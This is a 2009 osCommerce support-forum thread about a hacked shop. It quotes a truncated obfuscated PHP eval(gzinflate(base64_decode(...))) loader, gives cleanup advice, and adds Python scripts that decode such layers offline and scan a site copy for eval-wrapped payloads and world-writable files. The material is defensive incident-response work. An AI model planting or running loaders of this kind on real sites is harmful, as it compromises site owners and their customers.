fatshoesday Posted October 26, 2009

Hi, This file is in my root directory. It looks like code I saw when our site got hacked. I tried deleting it but it keeps reappearing. Any advice?

<?php eval(gzinflate(base64_decode(' pX1dkyu9bea9f8VbtRfOVq2qRtLMaKY2iSsbOylfxE5lvRd7daql6ZH6jKSW1dKZV+fXByT6g/jgQ419 49dnBOIB2SQIggD4u3/+x9+ddqffvNXvzbH+h9/+53/9+ff/71//8u1P//Iff/g2X76+/vZ//fLbc12/....

I also have this file appearing: DS_Store - Don't know what it is either?

FIMBLE Posted October 26, 2009

It means, I'm sorry to say, that you have been hacked. Click the link in my signature for help.

Nic

fatshoesday Posted October 26, 2009

I do not understand. I completely deleted the original site and replaced it. Changed the Admin folder file name and everything. How can it be coming back?

web-project Posted October 26, 2009

> It means, I'm sorry to say, that you have been hacked. Click the link in my signature for help.
> Nic

The code itself means nothing and doesn't mean that you've been hacked; it's simply that someone encoded a nasty piece of code (to trace or spy) inside of your osCommerce.

fatshoesday Posted October 26, 2009

Hi, I tried the decoder and it appears to be a binary output, which I believe I should not open? What do I need to do next?

fatshoesday Posted October 26, 2009

> The code itself means nothing and doesn't mean that you've been hacked; it's simply that someone encoded a nasty piece of code (to trace or spy) inside of your osCommerce.

How does this help me get rid of it? Do I not need to get rid of it?

burtonsnow8 Posted October 26, 2009

> How does this help me get rid of it? Do I not need to get rid of it?

You should get rid of it. The decoder will usually show you where the malicious files are located. You will have to delete those files to make sure the script does not pop up anymore.

MrPhil Posted October 27, 2009

> The code itself means nothing and doesn't mean that you've been hacked; it's simply that someone encoded a nasty piece of code (to trace or spy) inside of your osCommerce.

Eh? Any time someone adds a piece of code, without authorization or knowledge of the owner, it is by definition a "hack". It doesn't matter how innocent (or not) it is.

> <?php eval(gzinflate(base64_decode(' pX1dkyu9bea9f8...

Just change eval to echo and it should print out the nasty code for you to see (rather than running it).

fatshoesday Posted October 29, 2009

> Eh? Any time someone adds a piece of code, without authorization or knowledge of the owner, it is by definition a "hack". It doesn't matter how innocent (or not) it is.
> Just change eval to echo and it should print out the nasty code for you to see (rather than running it).

I am afraid I am clueless. How exactly does this work once I change Eval to Echo?

burtonsnow8 Posted October 29, 2009

> I am afraid I am clueless. How exactly does this work once I change Eval to Echo?

Echo will make it write the decoded text to a page. Basically make a new file, paste the code, replace "eval" with "echo" and then load the page in your browser.

♥FWR Media Posted October 29, 2009

deleted as I spoke rubbish

MrPhil Posted October 29, 2009

> I am afraid I am clueless. How exactly does this work once I change Eval to Echo?

It will print out the code that it would have otherwise run (doing bad things, no doubt). You can look at this code to try to get an idea of what external web sites are involved (if any), what hidden files are being brought to be executed, and so on. Then you can proceed to find and exterminate these hacker files or database entries, block external sites (ban by IP), and take other actions. And of course, get rid of that line of code once you've got a look at what it does.

If you have no idea what's going on, you'll need to bring in someone who does. There's a good chance that there are hidden or concealed files on your site, or some script in a database entry or script in a planted image. It will take some detective work to find all the pieces.

Also check your PC: scan for spyware (such as password sniffers and keystroke loggers), not just viruses. You don't want a hacker reading all your passwords as soon as you type them in. Make sure your firewall is operating correctly. Change every password associated with your hosting site, osC admin, FTP access, etc. Change any directory or file permission that is "world writable" (e.g., 777, 666) to remove such permissions (first take a look at http://www.oscommerce.com/forums/index.php?showtopic=327395&view=findpost&p=1443272). Talk with your hosting service about security measures you can take. Upgrade to the latest osC (2.2 RC2a), to get the latest security fixes. Search this forum for additional security fixes. At the least, put your Admin directory tree under password protection. Remove the File_manager.

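The decoding step discussed above can also be done offline, as text, without running any PHP. This is an added example, not code from any poster in the thread: it peels nested eval(gzinflate(base64_decode(...))) layers and lists the URLs and IP addresses in the result. The function names, the size limit and the sample built by make_sample() are constructed for illustration.

```python
import base64
import re
import zlib

# eval(gzinflate(base64_decode('...'))) as quoted in the thread, whitespace-tolerant.
WRAPPER = re.compile(
    r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*['\"]([^'\"]+)['\"]",
    re.IGNORECASE)
URL = re.compile(r"https?://[^\s'\"<>)]+")
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
MAX_OUT = 5_000_000  # stop inflating at ~5 MB (decompression-bomb guard)

def inflate(b64_text):
    """PHP gzinflate() reads raw DEFLATE, so zlib needs wbits=-15."""
    raw = base64.b64decode("".join(b64_text.split()))  # drop line wrapping
    d = zlib.decompressobj(-15)
    out = d.decompress(raw, MAX_OUT)
    if d.unconsumed_tail:
        raise ValueError("inflated output exceeds MAX_OUT")
    return out.decode("latin-1")  # every byte maps to one character

def unwrap(php_source, max_layers=20):
    """Peel nested wrappers as text only; returns (innermost_code, layers)."""
    code, layers = php_source, 0
    while layers < max_layers:
        m = WRAPPER.search(code)
        if not m:
            break
        code = inflate(m.group(1))
        layers += 1
    return code, layers

def indicators(code):
    """URLs and IPv4 literals in the decoded code, for review and blocking."""
    return sorted(set(URL.findall(code))), sorted(set(IPV4.findall(code)))

def make_sample(layers=2):
    """Constructed, harmless input: a PHP assignment wrapped `layers` times."""
    code = "$u = 'http://example.invalid/drop.txt'; $h = '192.0.2.10';"
    for _ in range(layers):
        c = zlib.compressobj(9, zlib.DEFLATED, -15)
        blob = base64.b64encode(c.compress(code.encode()) + c.flush()).decode()
        code = "<?php eval(gzinflate(base64_decode('%s'))); ?>" % blob
    return code

if __name__ == "__main__":
    inner, n = unwrap(make_sample())
    print("layers:", n)
    print(inner)
    print(indicators(inner))
```

A blob that was cut short when copied may fail in base64 decoding or inflate to only part of the payload, so work from the complete file taken off the server.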
fatshoesday Posted November 1, 2009

Hi, I changed the eval to echo and browsed to the page, but it just came up "page not found" and did not print. I already moved my admin folder and deleted filemanager along with the other stuff, and after that the code seemed to return in this file "cacheseo_english.cache"

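Two points from the thread, the code coming back inside a .cache file and the advice to remove world-writable permissions, can be checked across a whole site copy in one pass. This is an added example, not code from any poster: it inspects every regular file regardless of extension and reports files that are world-writable or that contain an eval() of an encoded payload. The file names and contents in demo() are constructed.

```python
import os
import re
import stat
import tempfile

# eval( directly wrapping a decoder call, as in the snippet quoted in the thread.
OBFUSCATED = re.compile(
    rb"eval\s*\(\s*(?:gzinflate|gzuncompress|base64_decode|str_rot13)\s*\(",
    re.IGNORECASE)
MAX_READ = 2_000_000  # bytes inspected per file; larger files are only partly read

def scan(root):
    """Return {relative_path: [reasons]} for files that need review."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:  # no extension filter: payloads hide in any file type
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if not stat.S_ISREG(st.st_mode):
                continue  # skip symlinks, sockets, devices
            reasons = []
            if st.st_mode & stat.S_IWOTH:
                reasons.append("world-writable (%o)" % stat.S_IMODE(st.st_mode))
            with open(path, "rb") as fh:
                if OBFUSCATED.search(fh.read(MAX_READ)):
                    reasons.append("eval() of encoded payload")
            if reasons:
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                findings[rel] = reasons
    return findings

def demo():
    """Build a constructed three-file tree in a temp directory and scan it."""
    samples = {
        "index.php": (b"<?php echo 'hello'; ?>", 0o644),
        "tmp/example.cache": (b"<?php eval(gzinflate(base64_decode('AAAA'))); ?>", 0o644),
        "upload.php": (b"<?php echo 'ok'; ?>", 0o666),
    }
    with tempfile.TemporaryDirectory() as root:
        os.mkdir(os.path.join(root, "tmp"))
        for rel, (body, mode) in samples.items():
            path = os.path.join(root, rel)
            with open(path, "wb") as fh:
                fh.write(body)
            os.chmod(path, mode)
        return scan(root)

if __name__ == "__main__":
    for rel, reasons in sorted(demo().items()):
        print(rel, "->", ", ".join(reasons))
```

Run scan() against a downloaded copy of the site rather than the live document root, and compare flagged files with a clean osCommerce package before deleting anything.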